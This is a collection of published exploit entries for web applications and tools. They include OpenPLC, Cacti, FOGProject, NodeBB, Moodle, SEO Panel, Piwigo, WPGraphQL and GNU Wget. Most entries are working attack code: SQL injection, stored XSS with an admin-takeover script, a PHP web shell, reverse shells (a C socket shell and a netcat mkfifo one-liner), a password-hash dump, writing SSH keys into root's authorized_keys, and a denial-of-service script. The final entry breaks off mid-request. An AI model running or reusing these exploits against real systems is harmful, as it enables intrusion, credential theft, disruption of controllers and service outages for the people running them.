  1. # Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2) # Author: nu11secur1ty # Testing and Debugging: nu11secur1ty # Date: 04/25/2021 # Vendor: https://www.seopanel.org/ # Link: https://www.seopanel.org/spdownload/4.8.0 # CVE: CVE-2021-28419 [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # CVE-2021-28419 from selenium import webdriver import time #enter the link to the website you want to automate login. website_link="http://192.168.1.3/seopanel/login.php" #enter your login username username="spadmin" #enter your login password password="spadmin" #enter the element for username input field element_for_username="userName" #enter the element for password input field element_for_password="password" #enter the element for submit button element_for_submit="login" browser = webdriver.Chrome() browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() # Exploit browser.get((" http://192.168.1.3/seopanel/archive.php?from_time=2021-04-25&order_col=(SELECT 7397 FROM (SELECT(SLEEP(15)))nu11secur1ty)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id=1")) print("payload is deployed MySQL is not responding correctly...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(")
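#!/usr/bin/python3
# Exploit Title: OpenPLC 3 - Remote Code Execution (Authenticated)
# Date: 25/04/2021
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://www.openplcproject.com/
# Software Link: https://github.com/thiagoralves/OpenPLC_v3
# Version: OpenPLC v3
# Tested on: Ubuntu 16.04,Debian 9,Debian 10 Buster
"""Authenticated remote code execution against the OpenPLC v3 web server.

Every step is an ordinary feature of the web UI, chained together:

1. log in with the supplied credentials;
2. upload a trivial Structured Text program and register it;
3. replace the "custom hardware layer" C source with a reverse shell;
4. ask the server to compile the program, which builds step 3's code into
   the runtime;
5. start the PLC: the scan cycle calls updateCustomOut(), which connects
   back to us and execve()s /bin/sh.

Changes from the advisory script:
* the hard-coded ``session`` cookies are gone -- a per-request cookie
  overrides the one the requests.Session obtained at login, so they could
  only ever have matched the author's own instance;
* the program name the server assigns on upload is read from the response
  instead of being assumed to be 681871.st;
* listener IP/port are validated before being pasted into C source.

Caveat: execve() replaces the PLC runtime process, so a live controller
stops executing its logic the moment the shell connects.  Lab use only.
"""
import ipaddress
import optparse
import re
import sys
import time

import requests

# Advisory's hard-coded program name; used only if the upload response
# cannot be parsed.
DEFAULT_PROG_FILE = '681871.st'

# Minimal valid program: one boolean passthrough on a 50 ms task.
ST_PROGRAM = (
    "PROGRAM prog0\n"
    " VAR\n"
    " var_in : BOOL;\n"
    " var_out : BOOL;\n"
    " END_VAR\n"
    "\n"
    " var_out := var_in;\n"
    "END_PROGRAM\n"
    "\n"
    "\n"
    "CONFIGURATION Config0\n"
    "\n"
    " RESOURCE Res0 ON PLC\n"
    " TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n"
    " PROGRAM Inst0 WITH Main : prog0;\n"
    " END_RESOURCE\n"
    "END_CONFIGURATION\n"
)

# Custom hardware layer source.  The ignored_* tables and the two empty hooks
# are kept verbatim from the advisory's payload so the layer still builds;
# only updateCustomOut() carries the reverse shell.  %(ip)s and %(port)d are
# filled in by custom_layer_source().
CUSTOM_LAYER_TEMPLATE = '''#include "ladder.h"
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

//-----------------------------------------------------------------------------

//-----------------------------------------------------------------------------
int ignored_bool_inputs[] = {-1};
int ignored_bool_outputs[] = {-1};
int ignored_int_inputs[] = {-1};
int ignored_int_outputs[] = {-1};

//-----------------------------------------------------------------------------

//-----------------------------------------------------------------------------
void initCustomLayer()
{
}

void updateCustomIn()
{
}

// Runs once the PLC is started: connect back and hand the process to /bin/sh.
// execve() does not return on success, so this fires once per runtime start.
void updateCustomOut()
{
    int port = %(port)d;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("%(ip)s");

    connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);
}
'''

# The hidden input echoing the stored program name; attribute order inside
# the tag is not guaranteed, so both orders are tried.
_PROG_FILE_PATTERNS = (
    re.compile(r"""name=['"]prog_file['"][^>]*value=['"]([^'"]+)['"]"""),
    re.compile(r"""value=['"]([^'"]+)['"][^>]*name=['"]prog_file['"]"""),
)


def parse_args():
    """Parse the command line; exit with usage when anything required is missing.

    --rip and --rport end up verbatim inside C source, so they are checked
    to be an IPv4 literal and a port number rather than arbitrary text.
    """
    parser = optparse.OptionParser()
    parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)")
    parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")
    parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login")
    parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection")
    parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection")
    options, _ = parser.parse_args()

    required = (
        ('-u/--url', options.url),
        ('-l/--user', options.user),
        ('-p/--passw', options.passw),
        ('-i/--rip', options.rip),
        ('-r/--rport', options.rport),
    )
    missing = [flag for flag, value in required if not value]
    if missing:
        print('[+] Remote Code Execution on OpenPLC_v3 WebServer')
        print('[+] Missing option(s): ' + ', '.join(missing))
        print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444")
        sys.exit(1)

    try:
        ipaddress.IPv4Address(options.rip)
        port = int(options.rport)
        if not 0 < port < 65536:
            raise ValueError(port)
    except ValueError:
        print('[x] -i must be an IPv4 address and -r a port between 1 and 65535')
        sys.exit(1)

    options.url = options.url.rstrip('/')
    options.rport = port
    return options


def server_program_name(html):
    """Return the name the server stored the uploaded program under, or None.

    The advisory's traffic shows "program.st" being referred to afterwards as
    681871.st, i.e. the server apparently picks its own name and echoes it
    in a hidden ``prog_file`` field of the /upload-program response.
    """
    for pattern in _PROG_FILE_PATTERNS:
        match = pattern.search(html)
        if match:
            return match.group(1)
    return None


def custom_layer_source(rev_ip, rev_port):
    """Render the reverse-shell hardware layer for the given listener."""
    return CUSTOM_LAYER_TEMPLATE % {'ip': rev_ip, 'port': int(rev_port)}


def auth(session, host, user, password):
    """Check the host answers and log in; exits the process on failure.

    Login success is judged heuristically, as in the advisory: after a valid
    login the /programs page is large (> 30000 bytes), the login page is not.
    """
    print('[+] Remote Code Execution on OpenPLC_v3 WebServer')
    time.sleep(1)
    print('[+] Checking if host ' + host + ' is Up...')
    try:
        host_up = session.get(host, timeout=10)
    except requests.RequestException as exc:
        print('[+] This host seems to be down :( ' + str(exc))
        sys.exit(0)
    if host_up.status_code == 200:
        print('[+] Host Up! ...')
    else:
        print('[!] Host answered HTTP ' + str(host_up.status_code) + ', continuing anyway')

    print('[+] Trying to authenticate with credentials ' + user + ':' + password)
    time.sleep(1)
    session.post(host + '/login', data={'username': user, 'password': password})
    response = session.get(host + '/programs')
    if response.status_code == 200 and len(response.text) > 30000:
        print('[+] Login success!')
        time.sleep(1)
    else:
        print('[x] Login failed :(')
        sys.exit(0)


def injection(session, host):
    """Upload and register the ST program; return its server-side file name."""
    print('[+] PLC program uploading... ')
    upload = session.post(
        host + '/upload-program',
        headers={'Referer': host + '/programs'},
        files={
            'file': ('program.st', ST_PROGRAM, 'application/octet-stream'),
            'submit': (None, 'Upload Program'),
        },
    )
    prog_file = server_program_name(upload.text)
    if prog_file is None:
        prog_file = DEFAULT_PROG_FILE
        print('[!] Could not read the stored program name from the response; assuming ' + prog_file)

    # (None, value) tuples send plain multipart fields, matching the original's
    # hand-built multipart body.
    session.post(
        host + '/upload-program-action',
        headers={'Referer': host + '/upload-program'},
        files={
            'prog_name': (None, 'program.st'),
            'prog_descr': (None, ''),
            'prog_file': (None, prog_file),
            'epoch_time': (None, str(int(time.time()))),
        },
    )
    time.sleep(2)
    return prog_file


def connection(session, host, prog_file, rev_ip, rev_port):
    """Plant the C payload, compile it in, and start the PLC so it runs."""
    print('[+] Attempt to Code injection...')
    session.post(
        host + '/hardware',
        headers={'Referer': host + '/hardware'},
        files={
            'hardware_layer': (None, 'blank_linux'),
            'custom_layer_code': (None, custom_layer_source(rev_ip, rev_port)),
        },
    )
    time.sleep(3)
    # The UI offers no completion signal this script reads, so fixed delays
    # stand in for "wait for the compile"; raise them on a slow target.
    session.get(host + '/compile-program?file=' + prog_file)
    time.sleep(6)
    session.get(host + '/dashboard')
    time.sleep(3)
    print('[+] Spawning Reverse Shell...')
    start = session.get(host + '/start_plc')
    time.sleep(1)
    if start.status_code == 200:
        # HTTP 200 only proves start_plc was accepted; the shell arrives at
        # the listener, not in this response.
        print('[+] PLC started - check your listener on ' + rev_ip + ':' + str(rev_port))
    else:
        print('[+] start_plc returned HTTP ' + str(start.status_code) + ' :(')


def main():
    options = parse_args()
    session = requests.Session()
    auth(session, options.url, options.user, options.passw)
    prog_file = injection(session, options.url)
    connection(session, options.url, prog_file, options.rip, options.rport)


if __name__ == '__main__':
    main()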
3. # Exploit Title: Kimai 1.14 - CSV Injection # Date: 26/04/2021 # Exploit Author: Mohammed Aloraimi # Vendor Homepage: https://www.kimai.org/ # Software Link: https://github.com/kevinpapst/kimai2 # Version: 1.14 <https://github.com/kevinpapst/kimai2/releases/tag/1.14> # Payload: @SUM(1+9)*cmd|' /C calc'!A0 # Tested on: Win10x64 # Proof Of Concept: CSV Injection (aka Excel Macro Injection or Formula Injection) exists when creating a new timesheet in Kimai. The Description field is written into the CSV export unchanged, so a value that starts with a formula character (=, +, -, @) is evaluated by the spreadsheet application that opens the file; the payload above uses Excel's DDE syntax (cmd|'...'!A0) to launch calc.exe. To exploit this vulnerability: 1- Log in as a user. 2- Create a new timesheet. 3- Fill the description with the payload above. 4- Save the timesheet. 5- Export it via CSV. 6- Open the CSV file in Excel, allow all security prompts, and the payload executes (Calculator opens). Note that the impact is on whoever opens the export: Excel has to be permitted to run DDE for this payload to fire, and the CSV is harmless to Kimai itself.
4. # Exploit Title: Monitorr 1.7.6m - Persistent Cross-Site Scripting # Date: 25/4/2021 # Exploit Author: Ahmad Shakla # Software Link: https://github.com/Monitorr/Monitorr # Tested on: Kali GNU/Linux 2020.2 # Detailed Bug Description : https://arabcyberclub.blogspot.com/2021/04/monitor-176m-file-upload-to-xss.html An attacker can perform a stored XSS attack via the service image upload: the uploaded file's name appears to be echoed into the page unescaped, so a name that closes the surrounding tag and injects an <img> element runs script for anyone who views the settings page. Steps: 1) Create a file whose name is the payload, in the following format: ><img src=x onerror=alert("XSS")>.png 2) Install the database by visiting the following link (on this target the installer is still reachable, which is what allows the unauthenticated registration in step 3): https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/_install.php 3) Register a new account on the server via the following link: https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php?action=register 4) Log in with your credentials at the following link: https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php 5) Go to the following page and upload the payload file: https://monitorr.robyns-petshop.thm/settings.php#services-configuration
  5. # Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service # Author: Dolev Farhi # Date: 2021-04-12 # Vendor Homepage: https://www.wpgraphql.com/ # Version: 1.3.5 # Tested on: Ubuntu """ This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors. """ import sys import requests def usage(): print('* WordPress GraphQL 1.3.5 Denial of Service *') print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0])) print('python {} http://site.com 10000 100'.format(sys.argv[0])) sys.exit(1) if len(sys.argv) < 4: print('Missing arguments!') usage() def wpgql_exists(): try: r = requests.post(WORDPRESS_URL, json='x') if 'GraphQL' in r.json()['errors'][0]['message']: return True except: pass return False # This PoC assumes graphql is located at index.php?graphql WORDPRESS_URL = sys.argv[1] + '/index.php?graphql' FORCE_MULTIPLIER = int(sys.argv[2]) CHAINED_REQUESTS = int(sys.argv[3]) if wpgql_exists is False: print('Could not identify GraphQL running at "/index.php?graphql"') sys.exit(1) queries = [] payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'} for _ in range(0, CHAINED_REQUESTS): queries.append(query) r = requests.post(WORDPRESS_URL, json=queries) print('Time took: {} seconds '.format(r.elapsed.total_seconds())) print('Response:', r.json())
  6. # Exploit Title: Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS) # Date: 21-04-2021 # Exploit Author: Sreenath Raghunathan # Vendor Homepage: https://getkirby.com/ # Software Link: https://github.com/getkirby/kirby # Version: 3.5.3.1(REQUIRED) # CVE : CVE-2021-29460 POST /api/users/<userid>/avatar HTTP/1.1 Host: <host> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-CSRF: <redacted> Content-Type: multipart/form-data; boundary=---------------------------286121627839893676321700902916 Content-Length: 563 Connection: close Cookie: <redacted> -----------------------------286121627839893676321700902916 Content-Disposition: form-data; name="file"; filename="svgxss.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,500 500,0" fill="#009900" stroke="#004400"/> "><script>alert(1)</script> </svg> -----------------------------286121627839893676321700902916--
7. # Exploit Title: FOGProject 1.5.9 - File Upload RCE (Authenticated) # Date: 2021-04-28 # Exploit Author: [email protected] # Vendor Homepage: https://fogproject.org # Software Link: https://github.com/FOGProject/fogproject/archive/1.5.9.zip # Tested on: Debian 10 On the attacker machine: 1) Create an empty 10 MB file. dd if=/dev/zero of=myshell bs=10485760 count=1 2) Append your PHP code to the end of the file created in step 1. echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell 3) Make the file "myshell" reachable over HTTP. $ cp myshell /var/www/html 4) Base64-encode the URL of "myshell" (replacing the attacker IP). $ echo "http://ATTACKER_IP/myshell" | base64 aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo= Note that echo without -n also encodes a trailing newline (the "Ao=" at the end of the value above); use echo -n if you want the encoded URL to be exactly the URL. 5) Visit http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<YOUR_BASE64_URL_HERE>&arch=arm64 Example: http://192.168.1.120/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=&arch=arm64 6) A textbox appears; change the Kernel Name (bzImage32) to myshell.php and click Install. The "kernel" is fetched from your URL and written under the web root with the name you chose, so the PHP runs when requested. 7) Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=hostname
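#!/usr/bin/python3
# Exploit Title: Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution
# Date: 04/28/2021
# Exploit Author: Leonardo Paiva
# Vendor Homepage: https://www.cacti.net/
# Software Link: https://www.cacti.net/downloads/cacti-1.2.12.tar.gz
# Version: 1.2.12
# Tested on: Ubuntu 20.04
# CVE : CVE-2020-14295
# Credits: @M4yFly (https://twitter.com/M4yFly)
# References:
# https://github.com/Cacti/cacti/issues/3622
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295
"""Cacti 1.2.12 authenticated SQL injection (color.php ``filter``) to RCE.

The injected statement does two things in one request: a UNION that dumps
user_auth (usernames and password hashes) into the colour export, and an
UPDATE that points the ``path_php_binary`` setting at a netcat reverse-shell
one-liner.  host.php?action=reindex then makes Cacti run "the PHP binary",
i.e. our command.

Operator caveats:
* ``path_php_binary`` is left pointing at the shell command; restore it
  (Console -> Settings -> Paths) after testing or Cacti's own jobs stay broken.
* The payload needs ``nc`` and ``mkfifo`` on the target, and a listener on
  --lhost:--lport before you run this.
"""
import argparse
import sys
import urllib.parse

import requests
from bs4 import BeautifulSoup

# proxies = {'http': 'http://127.0.0.1:8080'}


def get_csrf_token(html):
    """Return Cacti's csrf-magic token from the login page, or None.

    Looks for the hidden input named ``__csrf_magic`` first and falls back
    to the page's first input, which is what the original did.  Only the
    part before the first ';' is kept, matching the original script.
    """
    soup = BeautifulSoup(html, 'html.parser')
    field = soup.find('input', attrs={'name': '__csrf_magic'})
    if field is None:
        inputs = soup.find_all('input')
        field = inputs[0] if inputs else None
    value = field.get('value') if field is not None else None
    return value.split(';')[0] if value else None


def login(url, username, password, session):
    """Authenticate against /cacti/index.php; exits the process on failure."""
    print("[+] Connecting to the server...")
    try:
        get_token_request = session.get(url + "/cacti/index.php", timeout=5)  # , proxies=proxies)
    except requests.RequestException as exc:
        print(f"[-] Unable to reach {url}: {exc}")
        sys.exit(1)

    print("[+] Retrieving CSRF token...")
    csrf_token = get_csrf_token(get_token_request.text)
    if not csrf_token:
        print("[-] Unable to retrieve CSRF token!")
        sys.exit(1)
    print(f"[+] Got CSRF token: {csrf_token}")

    print("[+] Trying to log in...")
    data = {
        '__csrf_magic': csrf_token,
        'action': 'login',
        'login_username': username,
        'login_password': password
    }
    login_request = session.post(url + "/cacti/index.php", data=data)  # , proxies=proxies)
    if "Invalid User Name/Password Please Retype" in login_request.text:
        print("[-] Unable to log in. Check your credentials")
        sys.exit(1)
    print("[+] Successfully logged in!")


def build_payload(lhost, lport):
    """Return the injection string appended to ``filter=1`` in the export URL."""
    rshell = urllib.parse.quote(f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f")
    return (f"')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;"
            f"update+settings+set+value='{rshell};'+where+name='path_php_binary';--+-")


def exploit(url, lhost, lport, session):
    """Fire the injection, then trigger a host reindex so the command runs."""
    payload = build_payload(lhost, lport)
    exploit_request = session.get(url + f"/cacti/color.php?action=export&header=false&filter=1{payload}")  # , proxies=proxies)
    print("\n[+] SQL Injection:")
    print(exploit_request.text)
    # The reindex presumably blocks while our command runs, so a short
    # timeout and a swallowed timeout error are the expected outcome here.
    try:
        session.get(url + "/cacti/host.php?action=reindex", timeout=1)  # , proxies=proxies)
    except requests.RequestException:
        pass
    print("[+] Check your nc listener!")


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution')
    parser.add_argument('-t', metavar='<target/host URL>', help='target/host URL, example: http://192.168.15.58', required=True)
    parser.add_argument('-u', metavar='<user>', help='user to log in', required=True)
    parser.add_argument('-p', metavar='<password>', help="user's password", required=True)
    parser.add_argument('--lhost', metavar='<lhost>', help='your IP address', required=True)
    parser.add_argument('--lport', metavar='<lport>', help='your listening port', required=True)
    args = parser.parse_args()

    url = args.t.rstrip('/')
    session = requests.Session()
    login(url, args.u, args.p, session)
    exploit(url, args.lhost, args.lport, session)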
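#!/usr/bin/python3
# Exploit Title: NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write
# Date: 2021-02-01
# Exploit Author: 1F98D
# Software Link: https://nodebb.org/
# Version: Emoji for NodeBB <= v3.2.1
# Tested on: Ubuntu 18.04 (x86)
# Software Link: https://github.com/NodeBB/nodebb-plugin-emoji
#
# The Emoji for NodeBB which is installed by default contains an
# arbitrary file write vulnerability to insecurely handled user controlled
# input.
#
# This exploit requires administrative access to the NodeBB instance in order
# to access the emoji upload API.
"""Arbitrary file write through the emoji upload endpoint.

The ``fileName`` form field is not stripped of ``../`` components, so a
traversal prefix walks out of the emoji directory and the uploaded content
lands wherever the NodeBB process may write.  The defaults drop an SSH public
key into root's authorized_keys, which only works if NodeBB can write there;
adjust DESTINATION_FILE for the target.

Fixes relative to the original: the source file is opened in binary mode
inside a ``with`` block (it was a text-mode handle that was never closed),
and the CSRF regex no longer uses a greedy ``(.+)?`` that could run past
the attribute.
"""
import re
import sys

import requests

TARGET = 'http://192.168.1.1:4567'
USERNAME = 'admin'
PASSWORD = 'password'
DESTINATION_FILE = '/root/.ssh/authorized_keys'
SOURCE_FILE = '/home/kali/.ssh/id_rsa.pub'

# Custom User-Agent, kept from the original PoC.
HEADERS = {'User-Agent': 'NotPython'}

# Enough ``../`` to reach / from wherever the emoji directory lives.
TRAVERSAL_PREFIX = '../../../../../../..'

_CSRF_RE = re.compile(r'name="_csrf" value="([^"]+)"', re.IGNORECASE)


def fail(message, response=None):
    """Print an error (plus HTTP status and body if given) and exit non-zero."""
    print('[!] ' + message)
    if response is not None:
        print('[!] Status: {}'.format(response.status_code))
        print('[!] Response: {}'.format(response.text))
    sys.exit(1)


def extract_csrf(html):
    """Return the value of the hidden ``_csrf`` field, or None if absent."""
    match = _CSRF_RE.search(html)
    return match.group(1) if match else None


def main():
    s = requests.Session()

    r = s.get('{}/login'.format(TARGET), headers=HEADERS)
    if r.status_code != 200:
        fail('Error, {}/login unavailable'.format(TARGET))

    csrf = extract_csrf(r.text)
    if csrf is None:
        fail('Could not extract csrf token to proceed.')

    auth = {
        'username': USERNAME,
        'password': PASSWORD,
        '_csrf': csrf
    }
    r = s.post('{}/login'.format(TARGET), headers=HEADERS, data=auth)
    if r.status_code != 200:
        fail('Error, login failed', r)
    print('[+] Login successful')

    r = s.get('{}/admin/plugins/emoji'.format(TARGET), headers=HEADERS)
    if r.status_code != 200:
        fail('Error, could not access emoji plugin', r)
    print('[+] Emoji plugin is installed')

    with open(SOURCE_FILE, 'rb') as fh:
        files = {'emojiImage': fh}
        data = {'fileName': TRAVERSAL_PREFIX + DESTINATION_FILE}
        r = s.post('{}/api/admin/plugins/emoji/upload'.format(TARGET), headers=HEADERS, data=data, files=files)
    if r.status_code != 200:
        fail('Error, could not upload file', r)
    print('[+] Successfully uploaded file')


if __name__ == '__main__':
    main()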
10. # Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS) # Date: 04/2021 # Exploit Author: farisv # Vendor Homepage: https://moodle.org/ # Software Link: https://download.moodle.org https://github.com/moodle/moodle/archive/refs/tags/v3.6.1.zip # Version: Moodle < 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16 # CVE: CVE-2019-3810 Moodle is a learning platform designed to provide educators, administrators, and learners with a single robust, secure and integrated system to create personalised learning environments. The following is a PoC that uses the stored XSS on /userpix/ (CVE-2019-3810) for privilege escalation from student to administrator: the injected script runs in an administrator's browser, scrapes the admin's own sesskey from the front page and submits the admin/roles/admins.php form to add the attacker's account to the site administrators. 1. Upload the XSS payload [1] to pastebin or a similar service. Change the value of userid to your own id. Let's say the URL is https://pastebin.com/raw/xxxxxxxx. 2. Log in to your student account. 3. Set your first name to: " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement 4. Set your surname to: ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS') 5. Ask an administrator to open the /userpix/ page, or put a link to that page in your post and wait. The injected element is fixed and covers the whole viewport, so any mouse movement over the page fires the onmouseover handler. If successful, your account will be added as an administrator. See the demonstration video at https://github.com/farisv/Moodle-CVE-2019-3810 [1] XSS payload for privilege escalation on Moodle. Change the value of userid to your id.
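// XSS payload for CVE-2019-3810.  Runs in an administrator's browser, reads
// the admin's own sesskey from the front page and adds `userid` to the site
// administrators through admin/roles/admins.php.
var webroot = '/';
var userid = '3';
var sesskey = '';

// The front page embeds the session key in inline JS as "sesskey":"<key>".
var SESSKEY_MARKER = '"sesskey":"';
var SESSKEY_LENGTH = 10;

// GET webroot + path and pass the response body to success() on HTTP 200.
function get(path, success) {
  var xhr = new XMLHttpRequest();
  xhr.open('GET', webroot + path);
  xhr.onreadystatechange = function () {
    if (xhr.readyState > 3 && xhr.status == 200) {
      success(xhr.responseText);
    }
  };
  xhr.send();
  return xhr;
}

// POST a urlencoded form body to webroot + path; success() gets the response.
function post(path, data, success) {
  var xhr = new XMLHttpRequest();
  xhr.open('POST', webroot + path);
  xhr.onreadystatechange = function () {
    if (xhr.readyState > 3 && xhr.status == 200) {
      success(xhr.responseText);
    }
  };
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xhr.send(encodeURI(data));
  return xhr;
}

// Return the key following the marker, or '' when the marker is absent.
// The original sliced at indexOf() + 11 without checking for -1, which would
// have returned garbage from the start of the page and posted it as sesskey.
function extractSesskey(html) {
  var at = html.indexOf(SESSKEY_MARKER);
  if (at === -1) {
    return '';
  }
  return html.substr(at + SESSKEY_MARKER.length, SESSKEY_LENGTH);
}

function setAdmin() {
  // Assign administrator access to userid
  var bpath = 'admin/roles/admins.php';
  var data = 'confirmadd=' + userid + '&sesskey=' + sesskey;
  post(bpath, data, function (data) {});
}

function getSesskey(data) {
  sesskey = extractSesskey(data);
  if (sesskey === '') {
    return; // nothing to submit without a valid key
  }
  setAdmin();
}

function payload() {
  // We can find Sesskey inside JS script in main page
  get('', getSesskey);
}

// Start
payload();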
  11. # Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2) # Original Exploit Author: Dawid Golunski # Exploit Author: liewehacksie # Version: GNU Wget < 1.18 # CVE: CVE-2016-4971 import http.server import socketserver import socket import sys class wgetExploit(http.server.SimpleHTTPRequestHandler): def do_GET(self): # This takes care of sending .wgetrc/.bash_profile/$file print("We have a volunteer requesting " + self.path + " by GET :)\n") if "Wget" not in self.headers.get('User-Agent'): print("But it's not a Wget :( \n") self.send_response(200) self.end_headers() self.wfile.write("Nothing to see here...") return self.send_response(301) print("Uploading " + str(FILE) + "via ftp redirect vuln. It should land in /home/ \n") new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE) print("Sending redirect to %s \n"%(new_path)) self.send_header('Location', new_path) self.end_headers() HTTP_LISTEN_IP = '192.168.72.2' HTTP_LISTEN_PORT = 80 FTP_HOST = '192.168.72.4' FTP_PORT = 2121 FILE = '.bash_profile' handler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) print("Ready? Is your FTP server running?") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((FTP_HOST, FTP_PORT)) if result == 0: print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)) else: print("FTP is down :( Exiting.") exit(1) print("Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT) handler.serve_forever()
  12. # Exploit Title: Piwigo 11.3.0 - 'language' SQL # Author: @nu11secur1ty # Testing and Debugging: nu11secur1ty # Date: 04.30.2021 # Vendor: https://piwigo.org/ # Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0 # CVE: CVE-2021-27973 [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # Debug: @nu11secur1ty # CVE-2021-27973 from selenium import webdriver import time #enter the link to the website you want to automate login. website_link="http://192.168.1.3/piwigo/" #enter your login username username="admin" #enter your login password password="password" #enter the element for username input field element_for_username="username" #enter the element for password input field element_for_password="password" #enter the element for submit button element_for_submit="login" print("Loading... ;)") time.sleep(1) browser = webdriver.Chrome() browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() # Languages Exploit time.sleep(5) browser.get((" http://192.168.1.3/piwigo/admin.php?page=languages&language=TR_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(version()))%2C0)%20or%20%27&action=activate")) print("The payload for category Languages is deployed...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(")
  13. # Exploit Title: Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection) # Date: 02/05/2021 # Exploit Author: Syed Sheeraz Ali # Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows 10 20H2 + XAMPP v3.2.4 If we try to login as a voter and catch the login request in burp then pass it to sql map then we can put our payload in voter parameter Vulnerable code ``` Path :- /votersystem/login.php <?php session_start(); include 'includes/conn.php'; if(isset($_POST['login'])){ $voter = $_POST['voter']; <- vulnerable parameter $password = $_POST['password']; $sql = "SELECT * FROM voters WHERE voters_id = '$voter'"; <- Passed unsanitized input $query = $conn->query($sql); if($query->num_rows < 1){ $_SESSION['error'] = 'Cannot find voter with the ID'; } else{ $row = $query->fetch_assoc(); if(password_verify($password, $row['password'])){ $_SESSION['voter'] = $row['id']; } else{ $_SESSION['error'] = 'Incorrect password'; } } } else{ $_SESSION['error'] = 'Input voter credentials first'; } header('location: index.php'); ?> ``` Request ``` POST /login.php HTTP/1.1 Host: 10.129.139.200 Content-Length: 27 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.129.139.200 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-GPC: 1 Referer: http://10.129.139.200/ Accept-Encoding: 